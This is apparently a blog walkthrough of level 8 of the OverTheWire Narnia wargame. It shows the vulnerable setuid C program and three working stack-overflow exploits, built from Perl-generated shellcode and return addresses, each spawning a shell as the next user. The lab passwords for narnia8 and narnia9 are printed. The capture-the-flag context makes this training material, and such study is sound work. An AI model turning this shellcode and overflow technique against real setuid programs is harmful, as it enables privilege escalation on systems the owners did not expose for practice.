# Narnia wargame: Level 8 


# ssh narnia8@narnia.labs.overthewire.org
narnia8@narnia.labs.overthewire.org's password:6d6f6874687570686f67

narnia8@melissa$ file /narnia/narnia8
/narnia/narnia8: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia8@melissa$ cat /narnia/narnia8.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am
// making "i" global unti i find a fix
// -morla
int i;

void func(char *b){
        char *blah=b;
        char bok[20];
        //int i=0;

        memset(bok, '\0', sizeof(bok));
        for(i=0; blah[i] != '\0'; i++)
                bok[i]=blah[i];

        printf("%s\n",bok);
}

int main(int argc, char **argv){

        if(argc > 1)
                func(argv[1]);
        else
        printf("%s argument\n", argv[0]);

        return 0;
}
narnia8@melissa$ mkdir /tmp/n8
narnia8@melissa$ cd /tmp/n8
narnia8@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
narnia8@melissa$ ./getenvaddr EGG /narnia/narnia8
EGG will be at 0xffffd97d
narnia8@melissa$ /narnia/narnia8 `perl -e 'print "A"x20 . "\xeb\xd8\xff\xff" . "A"x8 . "\x8d\x7f\xff\xff" . "\x7d\xd9\xff\xff"'`
AAAAAAAAAAAAAAAAAAAAëØÿÿAAAAAAAA           ô/ý÷

$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165
$ exit
narnia8@melissa:/tmp/n8$ /narnia/narnia8 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xeb\x04" . "\xeb\xd8\xff\xff" . "\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x8d\x7f\xff\xff" . "\xeb\xd8\xff\xff"'`
1À°                     ÿÿëØÿÿëØÿÿíþ÷
   Rh//shh/binãëëØÿÿRâSáÍ           ô/ý÷


$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165
$ exit
narnia8@melissa$ ln -s /bin/sh sh
narnia8@melissa$ /narnia/narnia8 `perl -e 'print "\x31\xc0\x50\x68\x2e\x2f\x73\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xeb\xd8\xff\xff" . "A"x8 . "\x8d\x7f\xff\xff" . "\xeb\xd8\xff\xff"'`
1ÀPh./shãPâSá°            ÿÿëØÿÿëØÿÿíþ÷
              ÍëØÿÿAAAAAAAA           ô/ý÷

$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165
Posted by t0n1
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)